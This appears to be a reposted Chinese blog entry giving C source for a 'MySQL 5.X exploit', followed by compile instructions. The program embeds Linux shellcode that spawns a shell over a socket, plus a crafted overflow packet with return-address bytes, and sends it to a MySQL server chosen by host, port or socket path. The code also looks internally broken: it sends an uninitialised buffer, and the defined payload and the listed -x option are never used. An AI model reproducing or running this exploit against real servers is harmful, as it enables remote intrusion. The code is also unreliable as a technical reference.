MySQL 5.X exploit

 /* ****************************************************************
MySQL_Exploit.c
Exp [-s socket]|[-h host][-p port]][-x]
****************************************************************
*/

#include <stdio.h>
#include <mysql/mysql.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <sys/un.h>
#include <ctype.h>

int thd = 0x8b1b338;
int tbl = 0x8b3a880;
#define USOCK2 "/tmp/mysql.sock"
char addr_tdh[4];
char addr_tbl[4];
char addr_ret[4];

#define TBL_POS 182
#define THD_POS 178
#define RET_POS 174
#define SHL_POS 34
char shcode[] = {
0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89 // 12
,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1
,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80
,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0
,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80
,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f
,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 // 12*7= 84
};
int tmp_idx = 0;
int dump_packet_len = 7;
char table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 };
int payload_len = 371;
// header packet + select '0x39'
char query_payload[] = {
0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x27, 0x31, 0x32, 0x33 // 16   Some junk from position 6 ...
, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36 // 32
, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39 // 48
, 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x34 // 64
, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x35, 0x5f, 0x31, 0x32 // 72
, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35 // 88
, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38 // 94
, 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x6a // 112
, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3 // 128 endsh 118
, 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4c, 0x4d // 144
, 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x61, 0x61, 0x62, 0x62, 0x63 // 160
, 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0x6c, 0xbf, 0x6d // 176
, 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x14, 0xfe, 0x2e, 0x98, 0x27, 0x72, 0x0d // len=16*4+1=65;
};   

int anon_pckt_len = 65;

#define USOCK "/tmp/mysql2.sock"

int tcp_conn(char *hostname, int port)
{
int sockfd;
struct sockaddr_in servaddr;
struct hostent *hp;

if ((hp = gethostbyname (hostname)) == 0)
{
perror ("gethostbyname");
exit (0);
}

if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
{
perror ("socket");
exit (1);
}

bzero ((char *) &servaddr, sizeof (servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons (port);
memcpy (&servaddr.sin_addr, hp->h_addr, hp->h_length);

if (servaddr.sin_addr.s_addr <= 0)
{
perror ("bad address after gethostbyname");
exit (1);
}
if (connect (sockfd, (struct sockaddr *) &servaddr, sizeof (servaddr)) < 0)
{
perror ("connect");
exit (1);
}
return sockfd;
}

int unix_conn (char *path)
{
int fd, len;
struct sockaddr_un sa;
fd = socket (PF_UNIX, SOCK_STREAM, 0);

if (fd < 0)
{
perror ("cli: socket(PF_UNIX,SOCK_STREAM)");
exit (1);
}

sa.sun_family = AF_UNIX;
strcpy (sa.sun_path, path);
len = sizeof (sa);
if (connect (fd, (struct sockaddr *) &sa, len) < 0)
{
perror ("cli: connect()");
exit (1);
}
return fd;
}

int main (int argc, char *argv[])
{
int fd, i, ret;
char packet[65535], buf[65535], *path, *host ,c;
int port = 3306,db_len = 0;
int pckt_len = anon_pckt_len, unix_sock = 1, anon_pckt[pckt_len];
path = strdup (USOCK);
host = strdup ("127.0.0.1");
opterr = 0;

while ((c = getopt (argc, argv, "s:h:p:n:")) != -1)
switch (c)
{
case 's':
path = strdup (optarg);
unix_sock = 1;
break;
case 'h':
host = strdup (optarg);
unix_sock = 0;
break;
case 'p':
port = atoi (optarg);
unix_sock = 0;
break;
case 'n':
db_len = atoi (optarg);
break;
default: break;
}
bzero (packet, 65535);
pckt_len = anon_pckt_len + db_len;
printf ("%d\n", pckt_len);

for (i = 0; i < pckt_len; i++) packet[i] = anon_pckt[i];

if (db_len)
for (i = anon_pckt_len - 2; i < pckt_len; i++) packet[i] = 'A';

packet[pckt_len - 1] = '\0';
packet[0] = (char) (anon_pckt[0] + db_len) & 0xff;
packet[1] = (char) ((anon_pckt[0] + db_len) >> 8) & 0xff;

for (i = 0; i < pckt_len; i++) printf (" %.2x%c", (unsigned char) packet[i],((i + 1) % 16 ? ' ' : '\n'));

printf ("\n");

if (unix_sock) fd = unix_conn (path);else fd = tcp_conn (host, port);

sleep (1);
ret = recv (fd, buf, 65535, 0);
if (send (fd, packet, pckt_len, 0) != pckt_len)
{
perror ("cli: send(anon_pckt)");
exit (1);
}

ret = recv (fd, buf, 65535, 0);
for (i = 0; i < ret; i++) printf ("%c", (isalpha (buf[i]) ? buf[i] : '.'));
printf ("\n");
return 0;
}

Tips:

1.下载开发包
mickey@pentest:~$ sudo apt-get install libmysqlclient15-dev

2.成功编译鸟
mickey@pentest:~$ gcc -o mysql5.x_exploit mysql5.x_exploit.c 

本文转hackfreer51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/575451，如需转载请自行联系原作者